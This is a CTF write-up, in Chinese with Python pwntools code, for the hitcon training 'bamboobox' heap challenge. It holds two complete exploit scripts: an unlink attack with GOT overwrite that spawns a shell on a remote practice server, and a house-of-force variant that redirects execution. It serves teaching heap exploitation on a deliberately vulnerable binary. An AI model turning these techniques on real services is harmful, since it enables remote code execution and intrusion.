
hitcontraining_bamboobox (unlink | house of force)

December 24, 2020 • Read: 291 • Pwn

1.unlink
这种方法非常简单,也很容易构造,所以我决定挑战一下不用show()的写法。
需要1/16的概率来正确覆盖到堆地址。

from pwn import *
#context.log_level = "debug"
libc = ELF('./libc.so.6')  # libc shipped with the challenge; pwn() reads libc.sym from it
elf = ELF('./bamboobox')   # challenge binary; pwn() reads elf.got / elf.plt from it
def choice(idx):
    """Answer the program's menu prompt with option number *idx* (sent as text)."""
    option = str(idx)
    r.sendlineafter("Your choice:", option)

def show():
    """Select menu option 1 (named "show" in the write-up; unused by this script)."""
    return choice(1)

def add(size, content = 'sh'):
    """Menu option 2: create an item whose name length is *size* and whose name is *content*."""
    length_prompt = "Please enter the length of item name:"
    name_prompt = "Please enter the name of item:"
    choice(2)
    r.sendlineafter(length_prompt, str(size))
    r.sendafter(name_prompt, content)

def edit(idx, content):
    """Menu option 3: rename item *idx*; the length sent is always len(content)."""
    index_prompt = "Please enter the index of item:"
    length_prompt = "Please enter the length of item name:"
    name_prompt = "Please enter the new name of the item:"
    payload_len = len(content)
    choice(3)
    r.sendlineafter(index_prompt, str(idx))
    r.sendlineafter(length_prompt, str(payload_len))
    r.sendafter(name_prompt, content)

def delete(idx):
    """Menu option 4: remove item *idx*."""
    index_prompt = "Please enter the index of item:"
    choice(4)
    r.sendlineafter(index_prompt, str(idx))

def pwn():
    """Run the write-up's unlink path once against the global connection ``r``.

    Raises EOFError when the received value does not look like a 0x7f...
    address, so the module-level loop can reconnect and try again (the
    write-up puts the success rate of the partial overwrite at 1/16).
    """
    add(0x88) #0
    add(0xF8) #1
    add(0x18) #2
    add(0x18) #3
    target = 0x6020C8
    magic = 0x400D49  # NOTE: not used in this path

    # unlink
    FD = target - 0x18
    BK = target - 0x10
    edit(0, p64(0) + p64(0x81) + p64(FD) + p64(BK) + 'a' * (0x80 - 0x20) + p64(0x80))
    delete(1)

    #partial overwrite & free@got -> printf@got.plt & free@got -> system
    edit(0, p64(0) * 3 + p64(elf.got['free']) + p64(0) + p64(elf.got['free']) + p64(0) + '\x40\x00')
    edit(0, p64(elf.plt['printf'] + 6) + p64(elf.plt['puts'] + 6))
    delete(2)
    # Read up to the first 0x7f byte (1 s timeout) and unpack the last 6 bytes
    # as a little-endian pointer; the two constants are the write-up's offsets.
    malloc_hook_addr = u64(r.recvuntil('\x7f', timeout=1)[-6:].ljust(8, '\x00')) - 88 - 0x10
    if '0x7f' not in hex(malloc_hook_addr):
        raise EOFError  # value did not land; let the retry loop reconnect
    libc.address = malloc_hook_addr - libc.sym['__malloc_hook']
    edit(1, p64(libc.sym['system']) + p64(elf.plt['puts'] + 6))

    #getshell
    delete(3)
    r.interactive()

def _run_once():
    """Open one connection to the challenge and run pwn() against it."""
    global r
    #r = process('./bamboobox')
    r = remote('node3.buuoj.cn', 26620)
    pwn()

while True:
    # pwn() raises EOFError when its 0x7f check fails (a dropped connection
    # presumably surfaces as EOFError too); each attempt reconnects.
    try:
        _run_once()
    except EOFError:
        continue

2.house of force
这是要说明的重点方法,也是我做这道题的根本原因。
往低地址时,size 就是 (low_addr - 0x10) - top_addr;往高地址时,size 就是 (high_addr - 0x10 - top_addr) - 0x10。

这里要注意一个细节
第二次申请的时候,申请后的top chunk size不能小于MINSIZE(0x10),即申请前的malloc堆块要大于申请size + MINSIZE。
否则会触发重新申请top chunk,在检测是否对齐的时候就会报错。

from pwn import *
#context.log_level = "debug"
libc = ELF('./libc.so.6')  # loaded for parity with the unlink script; not referenced below
elf = ELF('./bamboobox')   # loaded for parity with the unlink script; not referenced below
r = process('./bamboobox')  # local run; the commented line below is the remote variant
#r = remote('node3.buuoj.cn', 26620)
def choice(idx):
    """Send menu option *idx* in reply to the "Your choice:" prompt."""
    reply = r.sendlineafter
    reply("Your choice:", str(idx))

def show():
    """Menu option 1 ("show" in the write-up); not called by this script."""
    return choice(1)

def add(size, content = 'sh'):
    """Menu option 2: create an item with name length *size* and name *content*."""
    choice(2)
    ask = r.sendlineafter
    ask("Please enter the length of item name:", str(size))
    r.sendafter("Please enter the name of item:", content)

def edit(idx, content):
    """Menu option 3: rename item *idx*, declaring exactly len(content) bytes."""
    choice(3)
    answers = (
        ("Please enter the index of item:", str(idx)),
        ("Please enter the length of item name:", str(len(content))),
    )
    for prompt, value in answers:
        r.sendlineafter(prompt, value)
    r.sendafter("Please enter the new name of the item:", content)

def delete(idx):
    """Menu option 4: remove item *idx*."""
    choice(4)
    ask = r.sendlineafter
    ask("Please enter the index of item:", str(idx))

magic = 0x400d49  # same value the unlink script names `magic`
add(0x30) #0
# house of force: the 0x38 bytes of filler run past item 0 into the next size field
edit(0, 'a' * 0x38 + p64(0xffffffffffffffff))
# NOTE(review): both heap addresses look copied from one debugger session and
# will differ between runs — recompute per the formula in the text above.
size = (0x1ecc000 - 0x10) - 0x1ecc060
add(size) #1
add(0x18) #2
edit(2, p64(magic) * 2)
choice(5)  # menu option 5; the write-up does not name it
r.interactive()